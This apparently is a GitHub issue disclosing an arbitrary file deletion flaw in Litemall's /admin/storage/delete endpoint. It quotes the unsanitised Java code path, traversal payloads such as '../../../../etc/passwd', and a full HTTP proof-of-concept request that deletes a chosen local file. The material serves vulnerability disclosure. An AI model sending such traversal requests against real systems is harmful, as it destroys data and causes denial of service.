Skip to content

Arbitrary File Deletion Vulnerability in /admin/storage/delete #564

New issue
New issue
Open
Open
Arbitrary File Deletion Vulnerability in /admin/storage/delete#564
@ez-lbz

Description

@ez-lbz
ez-lbz
opened on Jul 28, 2025

Arbitrary File Deletion Vulnerability in /admin/storage/delete

Summary

An arbitrary file deletion vulnerability exists in the Litemall system at the /admin/storage/delete endpoint. Due to insufficient validation of user-provided input, authenticated users with delete permissions can craft requests to remove any file from the server's file system, including critical system files. This vulnerability poses a high risk as it can directly lead to denial of service or further compromise of the system.

Details

The vulnerability is rooted in the following code path:

@RequiresPermissions("admin:storage:delete")
@RequiresPermissionsDesc(menu = {"系统管理", "对象存储"}, button = "删除")
@PostMapping("/delete")
public Object delete(@RequestBody LitemallStorage litemallStorage) {
    String key = litemallStorage.getKey();
    if (StringUtils.isEmpty(key)) {
        return ResponseUtil.badArgument();
    }
    litemallStorageService.deleteByKey(key);
    storageService.delete(key); // <-- sink
    return ResponseUtil.ok();
}

The key parameter, which is user-controlled, is passed directly to:

@Override
public void delete(String filename) {
    Path file = load(filename);
    try {
        Files.delete(file);
    } catch (IOException e) {
        logger.error(e.getMessage(), e);
    }
}

Because there is no sanitization or path restriction on key, attackers can supply arbitrary paths (e.g., ../../../../etc/passwd), resulting in deletion of arbitrary system files.

POC

  • Test in windows.
POST /admin/storage/delete HTTP/1.1
Host: localhost:8080
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1753431455,1753436446,1753450237; JSESSIONID=acdcb3c3-1eda-4407-9691-000f90d200f5; X-Litemall-Admin-Token=acdcb3c3-1eda-4407-9691-000f90d200f5
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Origin: http://localhost:9527
Sec-Fetch-Site: same-site
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Sec-Fetch-Dest: empty
Referer: http://localhost:9527/
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
X-Litemall-Admin-Token: acdcb3c3-1eda-4407-9691-000f90d200f5
sec-ch-ua-mobile: ?0
Sec-Fetch-Mode: cors
Accept: application/json, text/plain, */*
sec-ch-ua-platform: "Windows"
Content-Length: 227

{"id":1,"key":"C:\\Users\\86138\\Desktop\\a.class","name":"2.jpg","type":"image/jpeg","size":3781,"url":"http://localhost:8080/wx/storage/fetch/6fq5na4x56qvqpfm6niy.jpg","addTime":"2025-07-28 09:27:12","updateTime":"2025-07-28 09:27:12"}
Image

Exploitation Scenario

  1. Attacker crafts a request with a malicious key value such as ../../../important/system/file.

  2. The backend resolves this path and calls Files.delete(), effectively deleting arbitrary files.

  3. This can be used to delete application resources, configuration files, logs, or even critical OS files, potentially leading to denial of service or further privilege escalation.

Impact

  • High-risk: Attackers with valid credentials but low privilege can delete arbitrary system files.

  • Can lead to denial of service, loss of critical system data, and may enable further exploitation.

Root Cause

The root cause is trusting user-supplied file paths without performing validation or path canonicalization. The absence of whitelist restrictions and improper filtering of the key parameter directly enables path traversal and arbitrary deletion attacks.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions